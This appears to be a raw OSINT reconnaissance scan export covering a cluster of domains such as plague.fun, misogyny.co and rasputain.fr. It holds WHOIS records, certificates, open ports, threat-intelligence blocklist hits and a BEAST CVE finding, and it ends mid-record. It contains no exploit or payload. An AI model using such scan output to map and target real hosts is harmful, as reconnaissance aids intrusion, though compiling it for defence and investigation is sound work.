REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: ns2.dan.com Name Server: ns1.dan.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:41:01Z <<< For more information on Whois status codes, please visit https://icann.org/epp The above WHOIS results have been redacted to remove potential personal data. The full WHOIS output may be available to individuals and organisations with a legitimate interest in accessing this data not outweighed by the fundamental privacy rights of the data subject. To find out more, or to make a request for access, please visit: RDDSrequest.nic.co. .CO Internet, S.A.S., the Administrator for .CO, has collected this information for the WHOIS database through Accredited Registrars. This information is provided to you for informational purposes only and is designed to assist persons in determining contents of a domain name registration record in the .CO Internet registry database. .CO Internet makes this information available to you "as is" and does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data: (1) to allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone; (2) in contravention of any applicable data and privacy protection laws; or (3) to enable high volume, automated, electronic processes that apply to the registry (or its systems). Compilation, repackaging, dissemination, or other use of the WHOIS database in its entirety, or of a substantial portion thereof, is not allowed without .CO Internet's prior written permission. .CO Internet reserves the right to modify or change these conditions at any time without prior or subsequent notification of any kind. By executing this query, in any manner whatsoever, you agree to abide by these terms. In some limited cases, domains that might appear as available in whois might not actually be available as they could be already registered and the whois not yet updated and/or they could be part of the Restricted list. In this cases, performing a check through your Registrar's (EPP check) will give you the actual status of the domain. Additionally, domains currently or previously used as extensions in 3rd level domains will not be available for registration in the 2nd level. For example, org.co, mil.co, edu.co, com.co, net.co, nom.co, arts.co, firm.co, info.co, int.co, web.co, rec.co, co.co. NOTE: FAILURE TO LOCATE A RECORD IN THE WHOIS DATABASE IS NOT INDICATIVE OF THE AVAILABILITY OF A DOMAIN NAME. All domain names are subject to certain additional domain name registration rules. For details, please visit our site at www.cointernet.co . Domain name: misogyny.co Registry Domain ID: DE1B7F6E7E80840FABD3515F2E19A8DEC-NSR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-02-22T03:37:22.39Z Creation Date: 2018-03-07T07:39:37.84Z Registrar Registration Expiration Date: 2023-03-07T07:39:37.84Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 46710fa45d0846bc845a969a73e8377e.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 46710fa45d0846bc845a969a73e8377e.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 46710fa45d0846bc845a969a73e8377e.protect@withheldforprivacy.com Name Server: ns1.dan.com Name Server: ns2.dan.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T03:41:01.74Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:04:11 SSL Certificate - Issued to No SSL Certificate Analyzer 1 0 2 0 None C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com 188.114.97.1 2022-12-18 00:03:05 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.110 90.116.166.104 2022-12-18 00:03:05 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.113 90.116.166.104 2022-12-18 00:21:17 Open TCP Port No Censys 0 0 2 0 None 188.114.96.1:8443 188.114.96.1 2022-12-18 00:09:31 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.10:8443 188.114.96.0/24 2022-12-18 00:21:09 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["77b3795e1bf5904c-FRA"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": [""]} 188.114.96.0 2022-12-18 00:03:34 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lhcp3237.webapps.net 81.88.52.237 2022-12-18 00:31:37 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: plague.media Registry Domain ID: 6625164ce7ec46d0ab55b0957b9dd14b-DONUTS Registrar WHOIS Server: whois.godaddy.com/ Registrar URL: http://www.godaddy.com/domains/search.aspx?ci=8990 Updated Date: 2020-04-24T08:35:16Z Creation Date: 2018-02-03T01:46:57Z Registry Expiry Date: 2025-02-03T01:46:57Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Domains By Proxy, LLC Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Arizona Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: US Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: ns07.domaincontrol.com Name Server: ns08.domaincontrol.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:31:37Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. plague.media 2022-12-18 00:21:17 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["77b2bb53bf092c54-ORD"]} 188.114.96.1 2022-12-18 00:10:59 Affiliate - Domain Whois No Whois 3 0 4 0 None %% %% This is the AFNIC Whois server. %% %% complete date format: YYYY-MM-DDThh:mm:ssZ %% %% Rights restricted by copyright. %% See https://www.afnic.fr/en/domain-names-and-support/everything-there-is-to-know-about-domain-names/find-a-domain-name-or-a-holder-using-whois/ %% %% Use '-h' option to obtain more information about this service. %% domain: wanadoo.fr status: ACTIVE eppstatus: active hold: NO holder-c: ANO00-FRNIC admin-c: ANO00-FRNIC tech-c: BLF14-FRNIC registrar: NORDNET Expiry Date: 2023-09-06T11:03:56Z created: 1995-09-12T22:00:00Z last-update: 2022-10-31T23:07:53.716977Z source: FRNIC nserver: ns1.orange.fr nserver: ns2.orange.fr nserver: ns3.orange.fr nserver: ns4.orange.fr source: FRNIC registrar: NORDNET address: 20 Rue Denis Papin address: CS 20458 address: 59664 VILLENEUVE D'ASCQ CEDEX country: FR phone: +33.969360360 e-mail: administration@nordnet.com website: https://www.nordnet.com/offres/pack_relais/presentation.php anonymous: No registered: 1997-12-29T00:00:00Z source: FRNIC nic-hdl: ANO00-FRNIC type: PERSON contact: Ano Nymous registrar: NORDNET anonymous: YES remarks: -------------- WARNING -------------- remarks: While the registrar knows him/her, remarks: this person chose to restrict access remarks: to his/her personal data. So PLEASE, remarks: don't send emails to Ano Nymous. This remarks: address is bogus and there is no hope remarks: of a reply. remarks: -------------- WARNING -------------- obsoleted: NO eppstatus: associated eppstatus: active eligstatus: ok eligdate: 2017-12-29T00:00:00Z reachstatus: not identified source: FRNIC nic-hdl: BLF14-FRNIC type: PERSON contact: Beatrice Leopold Fenu address: 78 Olivier de Serres address: 75015 Paris country: FR phone: +33.145298193 fax-no: +33.144440181 e-mail: gestionndd@francetelecom.biz registrar: NORDNET changed: 2018-01-09T13:39:00Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC nic-hdl: ANO00-FRNIC type: PERSON contact: Ano Nymous registrar: NORDNET anonymous: YES remarks: -------------- WARNING -------------- remarks: While the registrar knows him/her, remarks: this person chose to restrict access remarks: to his/her personal data. So PLEASE, remarks: don't send emails to Ano Nymous. This remarks: address is bogus and there is no hope remarks: of a reply. remarks: -------------- WARNING -------------- obsoleted: NO eppstatus: associated eppstatus: active eligstatus: ok eligdate: 2017-12-29T00:00:00Z reachstatus: not identified source: FRNIC >>> WHOIS request date: 2022-12-18T00:10:59.299088Z <<< wanadoo.fr 2022-12-18 00:21:20 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77a96313b8e390fe-FRA 188.114.97.1 2022-12-18 00:07:57 Malicious Internet Name Yes Cleanbrowsing.org 0 1 1 0 None Blocked by Cleanbrowsing.org [zerotwo-best-waifu.online] zerotwo-best-waifu.online 2022-12-18 00:02:48 IP Address No Mnemonic PassiveDNS 56 0 1 0 None 104.21.19.243 plague.fun 2022-12-18 00:04:38 Raw Data from RIRs No Maltiverse 3 0 2 0 None {u'asn_registry': u'arin', u'country_code': u'US', u'classification': u'suspicious', u'asn_country_code': u'US', u'is_open_proxy': False, u'creation_time': u'2020-12-17 02:56:49', u'asn_date': u'2015-02-25 00:00:00', u'tag': [u'phishing'], u'postal_code': u'20500', u'is_mining_pool': False, u'ip_addr': u'172.67.147.230', u'number_of_offline_malicious_urls_allocated': 0, u'registrant_name': u'Cloudflare, Inc.', u'city': u'Washington', u'last_updated': u'2021-05-26 00:00:00', u'number_of_online_malicious_urls_allocated': 0, u'number_of_whitelisted_domains_resolving': 0, u'state': u'CA', u'is_known_scanner': False, u'location': {u'lat': 38.9071923, u'lon': -77.0368707}, u'type': u'ip', u'email': [u'abuse@cloudflare.com', u'noc@cloudflare.com', u'rir@cloudflare.com'], u'is_cnc': False, u'is_iot_threat': False, u'is_known_attacker': False, u'blacklist': [{u'count': 1, u'source': u'Hybrid-Analysis', u'first_seen': u'2021-10-31 19:15:15', u'description': u'Malware', u'last_seen': u'2021-10-31 19:15:23'}, {u'count': 1, u'description': u'BBVA Bancomer phishing', u'source': u'Antiphishing.com.ar', u'first_seen': u'2020-12-17 02:56:49', u'ref': [279], u'last_seen': u'2020-12-17 02:56:49'}], u'modification_time': u'2021-10-31 19:15:23', u'asn_cidr': u'172.67.144.0/20', u'number_of_domains_resolving': 0, u'is_tor_node': False, u'address': u'101 Townsend Street', u'cidr': [u'172.64.0.0/13'], u'number_of_blacklisted_domains_resolving': 0, u'is_distributing_malware': False, u'is_sinkhole': False, u'is_hosting': False, u'is_cdn': False, u'as_name': u'AS13335 - Cloudflare, Inc.', u'is_vpn_node': False} 172.67.147.230 2022-12-18 00:08:28 Open TCP Port No Pulsedive 0 0 3 0 None 81.88.52.222:443 81.88.52.222 2022-12-18 00:09:00 Physical Location No LeakIX 0 0 2 0 None Amsterdam, North Holland, Netherlands 188.114.96.1 2022-12-18 00:03:05 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None hook.plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 04:43:a4:7d:29:1f:15:0e:6b:ac:86:e4:4b:c0:be:69:71:a9 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Oct 6 20:16:48 2022 GMT Not After : Jan 4 20:16:47 2023 GMT Subject: CN=hook.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:f0:6d:9d:3e:65:e2:27:e7:f9:e7:b1:43:5d:9b: 9c:71:a3:74:87:8a:60:c8:7f:29:27:0c:3b:70:18: 0e:65:ff:e2:e4:6c:b2:93:6d:33:61:6a:bf:38:4f: 05:cd:5b:2e:49:18:0c:c5:32:5e:a6:f8:13:92:a2: 54:15:20:f1:b8 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 2D:72:09:99:1A:17:4B:10:83:60:E6:EB:30:F2:51:56:F6:45:4B:C4 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:hook.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : DF:A5:5E:AB:68:82:4F:1F:6C:AD:EE:B8:5F:4E:3E:5A: EA:CD:A2:12:A4:6A:5E:8E:3B:12:C0:20:44:5C:2A:73 Timestamp : Oct 6 21:16:48.471 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:B6:95:B7:C7:1C:80:2B:FD:7A:41:2D: D1:EE:2B:F0:0C:C7:D5:AD:4A:C9:E0:25:F1:61:3A:42: F4:C7:98:23:BC:02:21:00:B0:8C:72:F0:4F:8A:E8:6C: E9:F6:34:39:22:96:3C:C5:FF:9B:84:63:71:CD:62:74: 2D:25:B6:5D:82:07:80:00 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77: 15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13 Timestamp : Oct 6 21:16:48.762 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:DA:81:A7:33:FB:84:F9:8B:E8:59:67: 5A:B3:BB:7D:23:4E:13:C6:1F:EE:CC:11:CA:90:D9:C7: C2:B8:84:2C:2D:02:21:00:A5:46:C0:7E:74:96:53:9F: 09:9C:0C:0A:E5:A6:43:B1:BB:DE:4F:9A:14:FF:CA:3E: 71:1D:06:51:72:4F:0A:A0 Signature Algorithm: sha256WithRSAEncryption 55:5a:e5:d4:fc:c1:91:97:fc:62:bf:e7:7d:ab:bf:5e:2a:ad: c4:a2:38:e6:93:85:38:b7:1d:d3:de:32:0e:e2:4c:99:4d:11: 27:08:6e:c9:87:6b:86:71:63:52:48:6f:97:81:d6:f9:d3:dc: 30:6a:31:71:f9:50:72:a5:5c:59:fc:73:29:d0:b8:38:7a:27: 41:b3:38:31:80:5b:74:88:40:5c:51:13:29:ba:41:ab:49:a7: e8:e8:a1:04:15:8b:d3:c3:02:3a:31:08:81:2e:a2:e2:41:9c: f5:7c:f1:58:bd:ec:4c:d9:0f:e7:c3:72:72:de:1f:50:66:17: 23:e5:df:b5:36:49:5e:e1:af:17:75:d9:18:54:94:ad:e0:ae: 38:ac:2c:09:c5:01:1b:8f:32:6d:7c:38:3e:2d:4f:0d:f7:64: fd:89:7a:f0:42:66:14:a5:26:b2:2b:cf:14:ba:10:2f:cc:af: d0:b7:ba:7a:29:73:d4:f3:c1:81:fe:b4:29:3b:c6:4b:56:c8: 19:d2:3a:d5:73:1c:13:73:cf:59:a2:f3:e1:26:e5:8e:fe:04: 40:3b:31:4f:84:d4:d1:f1:ca:a5:a1:c2:9f:31:f4:54:e2:fe: 50:4a:40:71:15:f7:ff:77:5d:a2:45:82:9e:19:be:52:a9:21: 85:4e:41:e2 2022-12-18 00:03:25 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None 182.204.149.34.bc.googleusercontent.com 34.149.204.182 2022-12-18 00:03:09 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.228 81.88.52.232 2022-12-18 00:41:00 Similar Domain Yes TLD Searcher 1 0 1 0 None misogyny.co misogyny.wtf 2022-12-18 00:22:09 Malicious Internet Name Yes Cleanbrowsing.org 0 1 2 0 None Blocked by Cleanbrowsing.org [webmail.zerotwo-best-waifu.online] webmail.zerotwo-best-waifu.online 2022-12-18 00:18:21 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.8:80 188.114.97.0/24 2022-12-18 00:03:04 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:a4:99:c7:6c:cb:8c:60:87:12:4d:ac:6d:aa:bc:48:46:46 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Jul 4 17:47:44 2022 GMT Not After : Oct 2 17:47:43 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:ce:73:2c:c8:b3:db:26:51:e1:69:3c:75:92:d7: ab:cf:10:67:fe:05:65:9a:30:2d:7c:2d:4e:bf:1e: 15:12:c0:09:9c:ee:72:a7:89:e2:dd:d3:84:6a:4b: 52:9b:7c:3a:1c:0c:22:4c:2d:61:74:cf:f3:4e:65: 58:68:18:ae:42 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: EB:E4:FE:82:AF:4F:43:5A:7C:54:A8:CD:51:1C:E9:3D:A1:D3:59:44 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 41:C8:CA:B1:DF:22:46:4A:10:C6:A1:3A:09:42:87:5E: 4E:31:8B:1B:03:EB:EB:4B:C7:68:F0:90:62:96:06:F6 Timestamp : Jul 4 18:47:45.109 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:C6:AF:8E:EE:35:F5:BA:0F:D5:07:B3: CD:FF:DA:80:2E:52:74:BF:5E:FA:32:A4:C1:96:32:07: EA:B1:FD:8C:77:02:20:55:D1:FA:78:FD:7B:CF:6B:33: 09:31:34:F9:D7:15:91:7B:FC:85:A0:BD:11:DA:B6:DF: D8:B6:B1:A0:01:46:8D Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 46:A5:55:EB:75:FA:91:20:30:B5:A2:89:69:F4:F3:7D: 11:2C:41:74:BE:FD:49:B8:85:AB:F2:FC:70:FE:6D:47 Timestamp : Jul 4 18:47:45.115 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:03:7B:C2:27:5B:DD:A9:BD:2C:0B:34:D4: 4C:C0:99:D6:F8:68:DB:8E:2B:8F:22:CD:3C:A1:DA:BB: 18:DA:43:B7:02:20:3E:AD:F2:A8:58:09:D7:F4:A9:C4: 20:10:3F:08:D3:E9:2A:1F:C3:23:A3:54:CE:16:7A:71: EA:10:A7:26:76:16 Signature Algorithm: ecdsa-with-SHA384 30:65:02:30:6c:3f:69:03:1e:e0:cc:bd:a4:57:f4:5b:33:85: c6:e6:d6:1a:98:40:6f:a3:25:c6:8e:b9:e6:03:16:6c:f0:01: 0a:a0:bf:67:01:45:c9:17:13:93:a3:3c:a7:c1:25:c0:02:31: 00:df:d1:f3:29:0e:9b:f5:d2:37:66:1b:02:ce:6c:43:4a:4b: d3:83:d0:43:fd:ac:4d:1c:44:36:30:8c:63:36:5b:00:e9:58: 73:af:c7:7c:97:25:ae:bb:e5:28:3d:45:38 plague.fun 2022-12-18 00:09:18 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.4:8080 188.114.96.0/24 2022-12-18 00:04:28 Email Gateway (DNS MX Records) No DNS Raw Records 0 0 1 0 None eforward2.registrar-servers.com misogyny.wtf 2022-12-18 00:03:05 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.114 90.116.166.104 2022-12-18 00:03:04 IP Address No DNS Resolver 56 0 1 0 None 172.67.169.215 rasputain.fr 2022-12-18 00:21:51 Netblock Membership No Censys 0 0 2 0 None 172.67.128.0/20 172.67.137.37 2022-12-18 00:21:34 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 104.21.19.243 2022-12-18 00:11:27 Physical Address No GLEIF 0 0 3 0 None C/O REGISTERED AGENT SOLUTIONS, INC., 838 Walker Road Suite 21-2, DOVER, US-DE, US, 19904 Cloudflare\, Inc. 2022-12-18 00:21:37 Open TCP Port No Censys 0 0 2 0 None 20.226.83.185:2020 20.226.83.185 2022-12-18 00:16:59 HTTP Status Code No Web Spider 0 0 4 0 None 200 http://webmail.zerotwo-best-waifu.online/css/qbert_theme/template/custom.css?v=1.7.0 2022-12-18 00:22:07 Physical Location No Censys 1 0 2 0 None Kansas City, Missouri, 64184, United States, North America 34.149.204.188 2022-12-18 00:23:19 Country No Country Name Extractor 0 0 3 0 None United States Kansas City, Missouri, 64184, United States, North America 2022-12-18 00:04:28 Affiliate - Internet Name No DNS Raw Records 2 0 1 0 None dns1.registrar-servers.com misogyny.wtf 2022-12-18 00:09:48 Co-Hosted Site No HackerTarget 0 0 2 0 None autodiscover.nensi.eu 172.67.147.230 2022-12-18 00:22:14 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77ae21ddc93522c8-ORD Content-Encoding: gzip 172.67.169.215 2022-12-18 00:09:33 Open TCP Port No LeakIX 0 0 2 0 None 104.21.27.242:80 104.21.27.242 2022-12-18 00:13:35 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@cloudflare.com {u'asn_registry': u'arin', u'country_code': u'US', u'classification': u'neutral', u'asn_country_code': u'US', u'is_open_proxy': False, u'creation_time': u'2021-03-04 12:44:22', u'asn_date': u'2015-02-25 00:00:00', u'tag': [u'phishing'], u'postal_code': u'20500', u'is_mining_pool': False, u'ip_addr': u'172.67.190.129', u'number_of_offline_malicious_urls_allocated': 0, u'registrant_name': u'Cloudflare, Inc.', u'city': u'Washington', u'last_updated': u'2017-02-17 00:00:00', u'number_of_online_malicious_urls_allocated': 0, u'number_of_whitelisted_domains_resolving': 0, u'state': u'CA', u'is_known_scanner': False, u'location': {u'lat': 38.9071923, u'lon': -77.0368707}, u'type': u'ip', u'email': [u'abuse@cloudflare.com', u'noc@cloudflare.com', u'rir@cloudflare.com'], u'is_cnc': False, u'is_iot_threat': False, u'is_known_attacker': False, u'blacklist': [{u'count': 1, u'description': u'Phishing', u'labels': [u'compromised'], u'source': u'Maltiverse', u'first_seen': u'2021-03-04 12:44:22', u'last_seen': u'2021-03-04 12:44:22'}], u'modification_time': u'2021-03-04 12:44:22', u'asn_cidr': u'172.67.176.0/20', u'number_of_domains_resolving': 0, u'is_tor_node': False, u'address': u'101 Townsend Street', u'cidr': [u'172.64.0.0/13'], u'number_of_blacklisted_domains_resolving': 0, u'is_distributing_malware': False, u'is_sinkhole': False, u'is_hosting': False, u'is_cdn': False, u'as_name': u'AS13335 - Cloudflare, Inc.', u'is_vpn_node': False} 2022-12-18 00:25:32 Malicious IP Address Yes MetaDefender 0 1 2 0 None webroot.com [188.114.96.0] 188.114.96.0 2022-12-18 00:20:56 Netblock IPv6 Membership No Censys 0 0 2 0 None 2606:4700:3031::/48 2606:4700:3031::ac43:93e6 2022-12-18 00:03:07 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.186 34.149.204.188 2022-12-18 00:10:20 Vulnerability - CVE Medium Yes Tool - testssl.sh 0 1 2 0 None CVE-2011-3389 https://nvd.nist.gov/vuln/detail/CVE-2011-3389 Score: 4.3 Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. 188.114.97.0 2022-12-18 00:02:53 IP Address No Mnemonic PassiveDNS 35 0 1 0 None 90.116.166.104 rasputain.fr 2022-12-18 00:13:40 Open TCP Port No 